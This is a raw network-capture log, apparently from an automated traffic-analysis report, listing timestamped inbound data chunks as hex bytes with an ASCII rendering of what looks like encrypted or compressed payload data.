7f 6e bf 85 cb 1a ab 72 eb 1d bb f6 b3 26 c4 28 91 24 70 18 4f e3 ac 88 ef 54 0a 8b ab d4 23 d5 48 d3 f5 a7 f0 87 ec 7d c2 0b 34 d2 74 db 0d b8 5c 44 56 66 ea 17 0d c7 70 d7 2f 80 4e 53 3c 58 9f e8 6c Data Ascii: :J,0f1Em[;= Uj?=srI{LA{I8&u:K\U"O<[DDB[7Sw5v-on Nn?F[kgjgYWnr&($pOT#H}4t\DVfp/NS<Xl
2022-05-30 12:45:08 UTC	163	IN	Data Raw: e4 e0 00 3f 1f 84 f8 5b 42 d8 54 92 25 17 22 ed c6 1c e3 d2 9d d0 b5 fb 29 38 0d 6c e9 da 7f 7e 9e 10 81 cd 9e 82 49 81 84 4e e4 70 7f 46 35 b3 80 9a 9e c0 0c 36 1a 11 7e 89 87 0e bd 41 0f 9b 78 34 0d 16 89 86 b2 d0 bd 0e 27 70 5f 96 eb 2d fb 99 23 93 eb fd 81 84 c3 0f ad b8 0d 82 c0 15 bd 47 ae 74 47 63 16 b5 d8 fb fa 1e 3b 89 9f 42 96 e3 51 ba 99 7c ba 39 47 07 65 d4 28 f2 3a 17 17 7b 57 f0 30 e7 3d 1c 4e a4 06 20 02 29 67 67 62 c5 73 15 98 ec 76 38 0b 82 24 cd 84 19 23 b4 9e 1b 49 71 f6 5c 38 4a 6f aa 7b 50 48 6e f6 b0 64 dc 3e 36 b9 79 e8 c7 33 20 35 52 1b 2b bc 6d c8 f8 a6 f2 0d fd 9a 3b ec 67 f4 41 db 7c b5 ff 51 1f 32 fd ae 5f e8 fe f7 77 26 0e 9b 10 1c a6 44 18 fa 3d 34 69 44 2e 53 f4 a1 b8 da 8c d0 c8 32 62 c6 3e 6a a6 33 9d f7 cd bc 7e 68 71 95 Data Ascii: ?[BT%")8l~INpF56~Ax4'p_-#GtGc;BQ\|9Ge(:{W0=N )ggbsv8$#Iq\8Jo{PHnd>6y3 5R+m;gA\|Q2_w&D=4iD.S2b>j3~hq
2022-05-30 12:45:08 UTC	164	IN	Data Raw: 95 d3 ad db 76 c7 1f 3e b4 78 62 f6 d3 30 28 55 3f 95 eb cc 24 22 2c 08 2a 29 8d 42 88 e7 aa 48 d6 c7 f0 bb 5c 97 4c 21 6a 62 7e eb 96 e8 0d c9 b6 6c e2 d6 dc ad 34 1b 06 7a dc ca ea 63 f1 ab d2 ea 54 d0 ca 6e 42 14 d9 ca df 17 f0 99 1c 9a 35 9c fb e2 f7 a1 84 80 1e b4 33 3c a8 d1 d7 ce 1f 44 20 5f b6 d0 ca e5 39 12 cd ed 95 75 3d 9e 0c 53 19 df cf c9 fc 75 c9 72 c7 7d 8f e2 23 df d0 1a 50 9a 4b 5c d6 d1 d4 86 ec 81 7a 9d fa 78 89 46 64 2a 4e 4c f3 95 6b 18 b0 20 c3 4e 04 af fe a6 fb f2 74 be 03 67 e9 d2 0d 6a bb d6 5a cc 05 8e a1 5d 2a 07 f1 ee f2 a5 83 2a d3 46 37 04 f0 1b 69 d1 63 d5 04 f9 55 04 a2 2b c7 c5 a7 76 6a 8f b8 0c f0 41 de 9a b3 56 4d 75 ce 40 5c 5b f5 49 2c 60 eb ea 93 a5 04 1e 4b 26 f9 7b b0 d6 00 1b 9c ec 54 19 2b 08 83 32 bd 91 d9 9c 89 Data Ascii: v>xb0(U?$",)BH\L!jb~l4zcTnB53<D _9u=Sur}#PK\zxFdNLk NtgjZ]**F7icU+vjAVMu@\[I,`K&{T+2
2022-05-30 12:45:08 UTC	165	IN	Data Raw: 21 82 e3 c0 49 a6 df 0a 3a 23 8d 3b c7 9b 01 b6 4f a5 03 93 2d 59 71 ee cc 28 66 8d 64 c2 1c 89 47 71 b6 97 f0 2a be 65 51 6d 7c 12 8d c6 a0 01 92 5b 30 ac 3e d3 81 5d c3 27 b1 9c a5 b7 90 5e c9 5b 4e a2 ba 45 d0 20 31 1c 16 e8 45 fc 16 ed 23 22 b6 a9 ca 3c 54 9d bb 85 cc af 91 5c 9d 12 54 8e a7 39 38 74 43 44 d2 2f 40 47 b4 4b 67 b3 b2 23 3e ad 78 e1 aa f8 2d 95 48 65 f7 70 b7 cf 06 a8 13 ab 04 71 76 78 84 6e db 12 76 16 ba 29 f5 e6 5c 11 88 90 1f dd fe e6 f7 9d 79 73 e8 5d 82 00 5b ad 7e 8b 24 6f ca 05 1d d3 1d a1 b6 2a 4e a6 84 2c 5c 0c ef c7 ac eb dc dd 4a d9 38 a2 8e f7 5b 63 fa d9 6b d2 7a 75 ed 7f a8 2d da 7e dc 9a 87 27 ea f1 80 2b 57 36 fa 85 7b 28 9e 48 f4 a1 95 2c c1 d6 bd 1a 4b ff d1 20 f5 f7 05 6c 52 29 bd 5b e9 9a 7c dc f4 e1 ce 0b 6f 0d e8 Data Ascii: !I:#;O-Yq(fdGqeQm\|[0>]'^[NE 1E#"<T\T98tCD/@GKg#>x-Hepqvxnv)\ys][~$oN,\J8[ckzu-~'+W6{(H,K lR)[\|o
2022-05-30 12:45:08 UTC	166	IN	Data Raw: 6f 7f f3 d8 a2 8d 0e 4b 76 cc e2 7c b2 43 9e b8 d9 eb 76 fa 2d c5 3d d4 68 76 c9 61 ed ed ca fa dd 2f cc c6 d6 98 e1 71 d6 58 04 f8 c7 60 1d 9f 6e 58 ae ad 37 57 57 ee 1c 93 a5 80 9c dc 18 d9 e6 b5 11 c3 c5 9a 6d d4 37 6f 4c 5d 67 62 b1 4b 15 98 80 24 ae a9 76 77 32 f0 16 4b 61 19 ca 9b 3e fa c7 b5 06 4b 39 46 8c 3f 4a de d3 b7 1e 72 12 2a 61 11 0b 3c a5 3d 1e 3f 03 ab 35 d6 bc f1 2c 23 6e cb b6 a0 c8 1c 2a 00 4a 30 09 a9 22 43 82 cd 9a 59 33 1f 61 a6 e6 70 ea ec ff 96 5a 53 16 37 67 90 61 ac bc ef 29 70 c2 83 9e ee 19 45 13 f9 af 32 f2 b0 65 43 8f f7 52 14 1e 0c 9e 89 3d 04 ad 65 84 98 3a 97 97 75 13 31 47 4f 4b cc cb 91 b5 6a b6 ef b3 38 e6 98 e8 0d c2 e7 07 d6 91 42 5f 8b 33 ba 76 62 41 3d a0 4c 35 5d 89 a1 88 87 e5 f7 f4 35 fa 7c bf 2f 4d a5 5a 9f 2b Data Ascii: oKv\|Cv-=hva/qX`nX7WWm7oL]gbK$vw2Ka>K9F?Jra<=?5,#nJ0"CY3apZS7ga)pE2eCR=e:u1GOKj8B_3vbA=L5]5\|/MZ+
2022-05-30 12:45:08 UTC	168	IN	Data Raw: d4 18 1b d7 31 21 07 b5 63 04 65 37 b3 56 cc 68 ec 9f 1d c0 a4 b7 9c 72 c8 3d bc 02 bd 57 6b 2c 25 3d fb 6b 79 ed fa e0 28 a6 fe 2f 13 47 f1 e8 09 dc 36 03 01 da ce fc d1 7f 98 dc 59 0b 6e d2 1c 09 fe 58 72 97 30 2c 91 75 95 fd 36 3c 57 4c 73 8d 44 e7 dc 11 93 9b b9 de 38 20 b3 8a d1 54 38 17 b4 f4 1b d6 71 99 f5 b9 30 b3 e0 35 0d 4b d7 a7 a9 b7 47 76 d1 c2 de a7 0c 3e 31 d0 91 56 d1 63 75 83 e4 5f ba 77 c3 3e f2 83 74 95 7f 6a c7 07 a6 a6 09 b1 56 bb b8 a9 4c a3 86 f5 4c 28 0b c4 ce c3 26 33 48 87 c6 fd 73 3b 13 e8 aa f8 27 5b 9c 55 4c a7 12 42 da 56 59 48 5b b9 7e e6 dc 35 b7 bd f3 25 dc 4f 60 ba 0a 60 b8 9b d7 f0 8f 89 81 67 b9 ca c7 3d 7a 80 b9 87 e3 7f ff 2a a1 0c 48 ad 36 b6 64 77 3a af 91 7f f3 53 1e f1 a1 da 70 83 45 a0 f5 43 f5 92 83 03 ea 01 dd Data Ascii: 1!ce7Vhr=Wk,%=ky(/G6YnXr0,u6<WLsD8 T8q05KGv>1Vcu_w>tjVLL(&3Hs;'[ULBVYH[~5%O``g=z*H6dw:SpEC
2022-05-30 12:45:08 UTC	169	IN	Data Raw: 84 4e 30 8e fe f0 7c 52 41 46 88 d2 c6 8a 00 b6 22 b1 4f 15 67 4b 38 48 66 3f 3e 75 fb f8 cd b7 e4 23 dd 0b eb 0a 4c 56 8e 6b 18 ec 7c b0 97 43 e0 c4 5b 81 51 3d 8f c3 31 5e 0c a0 2f 6f 8b bc 6f 80 fd 9a 1a 5e 6a 51 d8 bd 03 c7 80 7f 05 54 06 ae 8c 4f dd ee e6 e7 46 e6 16 f2 79 09 c8 ea ea dd 06 68 c0 16 b4 7a 77 eb ae b6 eb 43 23 22 7f 0b 81 44 97 b0 04 9a 71 e1 ca b3 71 fa 73 26 26 80 5b 40 33 35 27 b8 f2 69 4d ca a6 5d 35 f3 08 ea c9 eb 77 1c b3 0c 7b f4 fa 8b e9 62 23 54 0b df e5 6f c7 4d 33 db fd 26 a7 d9 17 c3 44 36 7d 8e 11 bb 08 bd 35 1f d9 7c 60 3e 36 a9 c8 d5 05 91 58 0a 3d fc e7 dd 1a c7 f8 fc 84 f5 65 4e b9 81 04 2a 8f e0 42 7d f2 e2 e2 de 2f 2d 90 65 96 93 de 01 a9 54 1a 00 26 21 fe 18 af a6 34 53 3f ad 6b cf 76 7c a7 e8 3f 6c 61 9e 94 0f 70 Data Ascii: N0\|RAF"OgK8Hf?>u#LVk\|C[Q=1^/oo^jQTOFyhzwC#"Dqqs&&[@35'iM]5w{b#ToM3&D6}5\|`>6X=eN*B}/-eT&!4S?kv\|?lap
2022-05-30 12:45:08 UTC	170	IN	Data Raw: 48 35 48 18 7b bd 1c 8b 54 e4 5d 4e 55 b6 84 d8 33 b6 66 7e 2d bf 36 56 20 bd f2 b0 92 6e f4 9b eb 8d ae ef 50 82 12 66 f6 f8 15 bd fe 12 a1 91 c7 a8 65 77 d2 36 b2 47 70 65 c1 0e 2d a3 42 52 a5 ae f6 13 65 f5 e0 6e 3e 06 34 8e 85 d5 46 ca 16 f2 30 b8 cc da 75 61 1c a6 42 9b 81 2b e0 76 e3 d2 fa c8 57 cb 42 df 7c 61 9a 00 42 4b 7c 59 80 be e0 32 c8 5a f1 f6 e4 ec 99 eb 94 3d bb e4 b1 55 4a 5b c5 ff 10 09 f2 94 3b 0b 78 02 c7 3e 9a 64 9a 1c b2 95 ef cc f2 b6 fa 34 c9 cd 2e b3 c1 33 ba 7e ed 92 f8 a3 4d 29 28 98 f2 54 59 bd 5e 9b f6 d9 b9 af 61 4d 26 fb 39 af 98 83 ca 9b 78 d8 2c a6 87 3c 89 7a a4 22 16 20 cc 59 f1 f5 6f 7c 99 f6 09 40 05 9a e9 1b 09 d3 58 51 b5 7f 37 95 84 c6 16 32 24 c0 df 3b 88 cc 61 c4 f0 4a 2d 3a a6 91 f2 17 a0 6c 22 b6 a9 71 af 1b 47 Data Ascii: H5H{T]NU3f~-6V nPfew6Gpe-BRen>4F0uaB+vWB\|aBK\|Y2Z=UJ[;x>d4.3~M)(TY^aM&9x,<z" Yo\|@XQ72$;aJ-:l"qG
2022-05-30 12:45:08 UTC	172	IN	Data Raw: f7 2d 12 ff c8 99 76 fe c3 3d d4 1d b6 83 d4 4a e9 8a 11 66 96 3c 3c b1 e3 72 e1 d1 e4 29 ea ec 96 90 95 b6 ce fb 34 34 47 94 6f ca c0 8c b7 70 28 b8 79 df ba f8 7b 0c c1 42 e7 c1 4c 54 a4 bf 3c 9a 09 25 4a 4c cc 7c 7c ff ee de b6 b4 f7 2c ee af b3 56 36 7f ce 60 c0 87 68 07 20 03 f4 5b 65 d0 dd 1b ec cd cd 0c 1f 13 47 e3 f0 9c 70 31 22 3b ab 99 45 bd 8e d2 9d d0 a2 fd 77 f4 0b 1d c1 cd 8e c4 c7 49 39 f4 6c 34 1a b9 0a 3e 35 17 9a 46 f9 f8 cb 84 04 37 7f 37 97 45 d1 3d 28 27 55 6f 33 db f1 fb d9 83 fc 0b 98 52 76 73 0e fb 88 4d 37 f5 9e 32 77 ab 60 fa 55 05 46 f9 d8 12 f2 c2 6f 1f bd 22 0d ab 94 17 55 ad 16 e8 7f e8 bf fc ff c6 60 96 90 83 f9 b8 a2 b2 90 dc bb 10 4d 62 71 43 ff 82 81 a9 b5 9a b8 6c 46 1e 2d bd f1 ff 5d 67 e9 ca 1b d1 dc d7 77 7f 3c 49 5b Data Ascii: -v=Jf<<r)44Gop(y{BLT<%JL\|\|,V6`h [eGp1";EwI9l4>5F77E=('Uo3RvsM72w`UFo"U`MbqClF-]gw<I[
2022-05-30 12:45:08 UTC	173	IN	Data Raw: 8e 15 21 61 5e 87 85 4f e3 53 77 cd cd c9 1e b4 9b 50 ba c2 80 9c a5 b2 9f 31 e1 96 57 9e d2 00 d4 67 fe 50 c1 a0 e4 2b c8 1f 4c a6 7b 0b 2f 95 30 77 b0 e4 17 35 c5 dd 69 5d b1 23 9e 3a 7f 2f ef db 40 f7 ed 7f 25 81 5a 90 73 32 87 07 e2 fd 78 36 f2 39 7f c0 89 71 c7 a7 01 9d fd 76 86 5f f1 b3 4f 56 bd 8f 56 2e 1e c3 b6 4a 03 85 ed 32 7e 68 89 a4 ce 0b 15 a8 ff 72 8d dc d5 5a e2 19 02 d5 6c 46 42 b8 6d d8 ca 2f 3a ee 02 62 c9 ab 8e f3 7c ed 9a 6a e6 b2 56 07 b6 c6 4e 26 7b 37 00 ab e0 67 99 59 18 f4 bf 9e 4b 25 b4 77 e4 6b f2 62 8b dd d2 d7 b0 8f 68 9b 01 e8 99 74 47 b0 86 67 bd 76 06 ed b5 fc e6 d8 e1 d8 e6 73 ac f3 8d fe 28 3f f4 0c c1 e8 e1 12 1f 03 66 b3 2d 21 c6 34 55 36 2f 5e d2 b3 a6 98 d3 39 9f 3a b8 a5 0d 9d 78 02 94 5d b4 37 a9 8f 9c 7d 90 19 a7 Data Ascii: !a^OSwP1WgP+L{/0w5i]#:/@%Zs2x69qv_OVV.J2~hrZlFBm/:b\|jVN&{7gYK%wkbhtGgvs(?f-!4U6/^9:x]7}
2022-05-30 12:45:08 UTC	174	IN	Data Raw: bc 13 f0 9d c3 75 f0 59 83 14 d5 46 c4 9e da d7 14 04 ea 70 61 99 66 bb d7 cf e0 31 db 7c e8 7f 37 a9 8a ea 01 d7 ba 71 83 27 a2 1e 81 b8 46 68 6e ec 42 f7 69 a5 ec b4 91 0c fb f6 f4 3c 8a 2a 6b b7 fd c0 48 91 55 c6 80 24 ad ab 91 76 04 21 e5 39 22 ef cd f2 3d 90 4f 0a 0a 42 7a dd 33 ba 7e 6a 3d f6 29 d6 c1 28 98 79 8c 06 3a 1d 3c 94 2d 94 84 e2 b5 5a 0c 43 ac 1f 55 ca 10 33 82 92 0e cf 1c 02 3c 3a f9 1f 51 28 b1 e0 ef ae 9c 11 8f c6 a0 01 24 de 62 83 e3 19 56 74 b6 70 38 18 0a b3 c9 db 3f bf cc 8a 3c 61 24 75 bc 58 b9 58 36 5c fe 2e 6c af fa 06 1a ef 78 8d 2f 73 c3 a1 eb 07 18 e4 d6 48 76 68 6f f9 9c e4 de 50 88 af 6b 93 2b 97 2d 12 87 f7 c6 d6 d3 6c c0 76 4f 0f 72 6e b8 3e db b3 bc 5b 67 2f 91 90 d7 39 8c 14 c2 6b 8b fc 8e ad fd 1e da 1d 4b 74 fa 4f 9b Data Ascii: uYFpaf1\|7q'FhnBi<*kHU$v!9"=OBz3~j=)(y:<-ZCU3<:Q($bVtp8?<a$uXX6\.lx/sHvhoPk+-lvOrn>[g/9kKtO
2022-05-30 12:45:08 UTC	175	IN	Data Raw: 25 8d a6 5a ab 08 b9 f6 30 3f 42 f8 22 d3 f7 36 a0 ce 2b d9 9a a5 28 46 45 ab 47 ec 1e 84 a5 f2 d3 9f b3 7b 07 1c 73 17 7e 16 f0 df 65 f9 5e 2a 59 d1 71 9a d5 9d d0 79 bb 8d dd 12 e7 3e b9 ca dc 24 17 ba 0a 66 0b 8a ba bd 87 0c e8 ee 7f 21 3d f6 21 f4 4d f3 69 c9 18 01 f8 55 00 06 3a 65 10 0c 9b e5 18 95 78 01 d8 0f 5e 60 7e 53 b2 0b 66 6f 52 43 93 9f 4f 8e a9 62 e5 53 b9 a4 de 6f 41 c9 de 79 34 4f f4 de 0b a7 03 04 e1 4f 20 9f 42 a0 ef 7b c8 a9 7c b6 39 dc 73 fa 91 94 0a 49 41 ff 3e 6f 56 4a 48 11 f2 c5 ea 22 38 ea 15 44 ec ac a6 31 da 23 28 88 32 28 20 9f b9 a8 19 37 26 d1 4b aa 37 7c 5d b5 06 ce 72 e6 12 26 e3 b8 73 1f 82 9a f9 aa 91 94 a4 d8 25 00 4d c0 fc ab 1f af a3 65 fc 02 63 82 85 60 80 67 e8 d4 cd b5 3c 59 9a 62 9a cd 00 c2 7b 3e 88 a0 b0 fb 50 Data Ascii: %Z0?B"6+(FEG{s~e^*Yqy>$f!=!MiU:ex^`~SfoRCObSoAy4OO B{\|9sIA>oVJH"8D1#(2( 7&K7\|]r&s%Mec`g<Yb{>P
2022-05-30 12:45:08 UTC	177	IN	Data Raw: 23 c9 6b 72 e0 ba 6a 90 fe e1 1f b4 c5 97 4c 8f ce 3c 4a af 66 c6 f4 ae 8a 60 2e c3 d6 b2 13 17 da e1 ab ad 3b 76 93 9b c1 c0 3b 3b 11 34 1f 64 4f bc 78 b2 87 95 c7 aa 00 df b0 4a 48 fd e5 e8 8d 18 c8 85 bd 45 e3 17 e8 02 62 b9 c8 96 86 c7 36 3d 19 7b 27 23 c8 23 a1 8d 36 f8 5b da 2d 20 90 85 d0 54 5a d7 cf 95 9f 6a 50 d9 e9 0f 66 c4 a0 33 18 14 7e ba 88 b8 81 10 b7 48 7f 08 c8 dd 61 f0 26 70 84 ea df 2b e3 a2 de b0 5e d1 51 48 f3 7f db ff 9e 26 c6 5a d3 a7 61 76 ab e6 1d dc 5a f4 1a 7d 3f 0f 7c f7 15 12 ff c8 cd cd d6 c1 d9 2b 96 cd 2a 08 39 6a fb 6b d8 b0 50 3d 3a 20 38 95 f6 b3 ef 9c ff 71 d4 32 1d 21 d4 85 ef a4 47 b4 54 ce aa 2a 90 58 b9 f4 00 22 c7 2a 40 e5 0e 3c 96 e0 26 17 10 f0 48 db c7 d7 61 bc d7 a7 5c 93 cb 17 0a 10 69 de 51 4c dd 4b b6 1c 3d Data Ascii: #krjL<Jf`.;v;;4dOxJHEb6={'##6[- TZjPf3~Ha&p+^QH&ZavZ}?\|+9jkP=: 8q2!GTX"*@<&Ha\iQLK=
2022-05-30 12:45:08 UTC	177	IN	Data Raw: b3 1d 40 df aa a6 f0 4b c7 57 01 89 7f a8 ec d0 6b 59 69 39 b1 aa b3 6d 3c 39 7c 31 f4 69 68 de 58 ff ac 44 2b 15 0b c5 42 25 07 f7 61 39 e1 8d 8d 48 fe 87 f5 79 98 93 c1 f8 9b de 48 98 b1 12 c6 af e8 43 bd 90 52 e7 19 a7 cc 08 b7 59 a1 a7 5c 3d bd 89 49 03 4e 0a fe fb a1 cc 7c 3c e4 6e f1 cb 0c ca 6d cb cb 2e 3a ee 80 ae 3c df 81 87 b1 f7 3f 97 26 2b ab cf 2f 3b 85 bf c6 81 5f e1 4c 57 85 d0 54 78 94 72 e8 60 87 7b 28 29 8c 84 f0 71 7a 16 13 09 9d 55 47 0b 5a ff 57 be 10 36 8a 76 14 6c b7 e0 ce 9f 24 72 65 be 70 2b 16 9c 78 9e 0c 53 05 20 7c de 76 71 a9 56 ba c6 a7 e2 23 a5 8e ae 2c 1e 41 0d d4 39 9f 33 95 84 6d 95 f4 de 94 ea e5 68 4d 8f dc d0 1f 80 c5 6d 6f 6c ab 41 32 12 88 dd 63 c6 fa ec 30 da 94 7e f3 56 57 47 8a 67 4b 0a 35 f8 b8 b8 f1 50 19 9b fd Data Ascii: @KWkYi9m<9\|1ihXD+B%a9HyHCRY\=IN\|<nm.:<?&+/;_LWTxr`{()qzUGZW6vl$rep+xS \|vqV#,A93mhMmolA2c0~VWGgK5P
2022-05-30 12:45:08 UTC	179	IN	Data Raw: 9f a1 4f d2 cf 33 62 68 6e 6c 0e cc 43 d8 fc bc 55 f7 4f 14 3e be 61 76 33 34 fb b9 ae 6e 4f af 97 ad cc d2 01 d8 19 7f d1 24 3e 80 b4 5b ce a1 9b fb 8f f1 66 fa 15 85 bf b9 cc 0f db 24 01 6d 3d 7c 6c c6 46 ac 98 f2 df 81 f5 f7 c8 85 ca e8 89 ea 9d 2e cd 2e da 1d 55 ca 1e b8 fb 15 ae 2f 68 60 84 20 f9 56 37 ef 71 33 0d 44 a1 99 48 86 ce 9c 53 3b 08 05 2a 7c 41 3c 1a 57 a5 a5 28 39 8a 50 3e df 33 8a 73 96 3f fe 71 8b d2 ef e8 a7 ba 0a 7c a9 fa 06 26 9a 6f 6e c1 7c 4a 56 3f 4e 14 13 5a 0c b3 e2 2b dd 03 20 73 e8 ac b3 e2 5c 43 a7 02 d5 1b 3f 78 e8 d1 77 c8 81 c3 23 76 bd af 7f a9 f9 13 b5 67 ff 63 6f 28 5d 1b c4 dd 10 bd f5 5a 2a 8f c9 78 c7 94 a9 3f 34 a9 82 a5 e9 b8 9b 30 9f b7 1c 24 63 d7 1f c5 a3 c1 96 9e 91 32 2a c7 b1 0f bd 80 ce b7 c8 52 33 9a 6f 3a Data Ascii: O3bhnlCUO>av34nO$>[f$m=\|lF..U/h` V7q3DHS;\|A<W(9P>3s?q\|&on\|JV?NZ+ s\C?xw#vgco(]Zx?40$c2*R3o:
2022-05-30 12:45:08 UTC	180	IN	Data Raw: 7a a9 43 79 70 6b f6 7d d8 d1 d9 a8 a5 2c 4f c1 72 43 5f d9 f4 e2 26 8d f0 1d e7 3e b9 f5 6d 1b e6 cf 4e 68 3c e6 4a 0e 0d 40 cc 75 32 1d 4c ac 99 12 3f 48 12 87 ce 8d f1 e4 24 5f 6f 33 10 88 e6 78 65 0a d1 53 8a 74 66 2b eb 60 79 64 e5 13 fb 1f b7 fb f5 89 22 33 20 53 b9 a4 b2 0c b4 15 35 05 d9 31 e0 ed ab c2 fd de 4e 58 1e 33 38 9f 1b 23 13 bd b0 fc 47 6f a8 63 50 e4 0e bd 42 e2 0f 58 24 f9 35 78 dd 8f 1d dd c7 67 b2 79 27 8a 0d ca ce 23 5a 3b 62 1c d4 4d c7 84 19 43 63 4a 11 30 6a fc 99 d5 c5 ca 5e 13 01 73 6e a5 6e c2 06 f9 e8 2a 48 17 82 3b 21 b7 9a 7d 07 54 41 c1 15 9f 56 c4 92 b9 b2 a0 43 61 ed e0 16 e5 72 98 77 52 85 cb 0d f6 c6 a7 71 ac c2 5c 31 91 32 eb 4f a5 63 69 bf 4b ce ff 37 22 c1 12 e7 70 61 9a 6a d8 5a f9 99 48 3c ea 36 c8 5a 29 cc a9 3c Data Ascii: zCypk},OrC_&>mNh<J@u2L?H$_o3xeStf+`yd"3 S51NX38#GocPBX$5xgy'#Z;bMCcJ0j^snn*H;!}TAVCarwRq\12OciK7"pajZH<6Z)<
2022-05-30 12:45:08 UTC	181	IN	Data Raw: eb 78 64 2f e2 19 09 3f 56 2a 11 be 20 9e 78 c0 af 6c 0b c1 fa 2a 0a a2 1e 38 44 4c 68 f3 b8 6b 3e fb ae 3f 01 4e 59 44 7f cc 57 6a 0a 35 89 35 00 26 99 13 bb 49 76 4d 69 a6 1d 82 ea 5b a8 7d e3 94 90 78 18 09 a2 88 ff cc e0 34 16 ff 06 b5 e4 2b 89 57 6b c4 bb 6b 2a 48 7f 03 80 0a bb d5 f1 49 a4 49 25 65 a6 07 71 1f 28 6a f6 5d 1b b9 20 85 b3 d8 31 30 4a e1 12 ab 5a 75 9e e5 5a 7f 68 da 66 8a 29 a6 3d 1c 7b 13 42 a6 2f 3d 58 d0 2e fd 33 4e 44 5e 89 1f 6c af fe 4b c9 3b 73 c2 84 88 65 66 74 0d 70 05 a2 36 89 4b c2 19 24 b8 fc b4 a3 d4 20 b7 6a 0c 41 8d 92 ab 8d 26 bd 2b e5 12 50 d1 10 4e 1d 67 30 ad be f1 0a 85 2b 95 45 6d 81 ad 22 cf 2d 5f 4e e8 65 61 ba a3 8a 29 8a 6d 64 8f c8 7b 79 e6 58 6f b3 4d 06 63 15 55 1f 4e 27 04 4e 56 98 2c d9 21 d6 52 d2 9d 5b Data Ascii: xd/?V* xl8DLhk>?NYDWj55&IvMi[}x4+WkkHII%eq(j] 10JZuZhf)={B/=X.3ND^lK;seftp6K$ jA&+PNg0+Em"-_Nea)md{yXoMcUN'NV,!R[
2022-05-30 12:45:08 UTC	182	IN	Data Raw: e2 f0 e8 13 3f 2c a1 3a 18 3c 05 df 6b 7b 52 8d f8 5c 98 fb 9e 91 d2 58 fb 62 6a 78 97 4a 89 c3 d6 52 10 b7 57 58 69 ab 4b 6c 99 06 01 d9 15 96 5b 30 80 57 06 55 c8 4b f8 62 17 e0 af 9f 36 c0 ab 4e c1 b7 c0 75 75 bc 58 b9 88 36 a0 a9 a5 12 2e 33 dd 4f b7 fa 6c 66 9a 53 2a 1b 5e 16 5e fd d9 3c 7f e6 e7 9c 0d f6 2f c1 a3 e2 54 43 ab 0a 1a ee a0 d9 0b 2c 31 67 83 cd a5 04 01 18 9b 72 ef 13 2f ab a1 17 d4 f3 7a 50 dc 86 cc 26 a8 28 eb 54 10 8e bb de db 72 e7 28 32 d1 f1 32 4a 8a 0f b7 a0 c4 94 a7 0a 3b 29 9b dd 9f 8a 17 96 18 82 98 f4 4f a5 af d8 57 1d 09 1e 2a a1 e0 29 01 28 29 fb f6 28 ef 9f e5 50 12 80 da 66 7d 89 88 0c e5 e8 e2 d2 69 c6 e2 0f ec 73 83 5a d1 fe c2 25 da dc 68 5d 73 7f d1 36 1e 54 15 67 0d b9 c7 9a 43 cc f9 59 a4 7a fa 33 b2 76 92 03 5f 0e Data Ascii: ?,:<k{R\XbjxJRWXiKl[0WUKb6NuuX6.3OlfS^^</TC,1gr/zP&(Tr(22J;)OW)()(Pf}isZ%h]s6TgCYz3v_
2022-05-30 12:45:08 UTC	184	IN	Data Raw: f4 03 5d ab f6 af 99 fa 88 c6 9f 91 37 6e de d7 cf 4a 26 8d b9 2c 53 1d 03 02 e8 88 1b c5 7f 2d 6a e8 de d6 0b 95 d2 95 c4 5d f2 4c 2c b2 4f de b9 a7 5d 4d d0 7c 26 95 84 0a 7d c4 f5 7b eb 8d 95 1a ba bc b7 cc 16 52 e8 a4 d4 33 46 7e 04 f0 d3 52 31 b9 f3 c3 f4 56 5f ce c8 28 41 6b 55 ba b5 b5 a3 0c 4b b2 18 f1 f6 98 f9 be a4 50 72 12 5e e5 b0 e5 be 64 9c 22 68 53 ab 94 79 08 25 bd c7 93 77 b9 25 54 ed a9 c4 cd f1 db f4 13 9f 91 62 61 e9 ba d3 dc 94 25 fd 25 38 9e 9f 54 e1 47 51 bf 93 ce 2b f6 c2 c5 77 c0 a7 a2 66 39 f4 bc 75 59 47 32 13 6b 4d ac 73 1c 1e 69 42 9e 76 c2 d0 ec b1 45 4a 73 f8 94 07 92 9e 9b 47 44 28 a3 29 ba ef f4 1f ea bd 23 3f 8f 79 fa e7 63 08 96 8e 77 48 47 9e c9 1b 86 dd 84 20 6e d6 67 0d 5c f0 b3 a6 ad 3b f1 ea f1 52 a0 20 c3 b8 cf 90 Data Ascii: ]7nJ&,S-j]L,O]M\|&}{R3F~R1V_(AkUKPr^d"hSy%w%Tba%%8TGQ+wf9uYG2kMsiBvEJsGD()#?ycwHG ng\;R
2022-05-30 12:45:08 UTC	185	IN	Data Raw: 9f fa c8 64 55 be 3e 84 2b 7a f6 07 27 5c 77 2e aa 84 84 80 a8 99 cc 35 49 07 ad 51 94 22 00 ed c3 f4 ee 6e 63 ae c4 e7 18 61 a6 20 0b 58 34 ea e1 12 17 07 7e b3 49 05 88 90 c0 91 20 b4 1e 94 86 3b 58 75 8c b7 e3 2d ed 0a fd cf c8 1c 3f 62 c7 cb 92 d7 9c ef 7b 3d 49 df ab 2f 25 e6 cf ee 9c 74 f2 13 6a 75 e9 fb 39 11 d6 98 60 3d c6 48 95 75 f2 c6 6e df 04 51 f5 04 e4 bd 2b e5 12 50 ef 18 c7 15 d5 37 e7 6b 0a 6b ff 9d 95 c3 17 6e c3 41 5e a6 98 93 30 fb d9 88 db f8 f5 01 ab 43 44 57 90 4d 03 bb 90 c9 06 a5 d3 98 e0 0c 82 5b ac e6 a9 43 f4 99 1f 12 99 3a b7 25 0d 89 3c f7 17 d4 fe 6d 5b 69 c5 91 7e 2a fb 40 c2 91 8c 6c 1c bb 30 ef 9d b3 32 56 23 39 0b bb 8b 00 5b a1 0c c3 d4 94 33 99 78 bf 80 8e 42 f3 d9 5d f9 57 19 04 fc e2 4c b2 ec 02 77 bf 03 86 8c 22 b9 Data Ascii: dU>+z'\w.5IQ"nca X4~I ;Xu-?b{=I/%tju9`=HunQ+P7kknA^0CDWM[C:%<m[i~*@l02V#9[3xB]WLw"
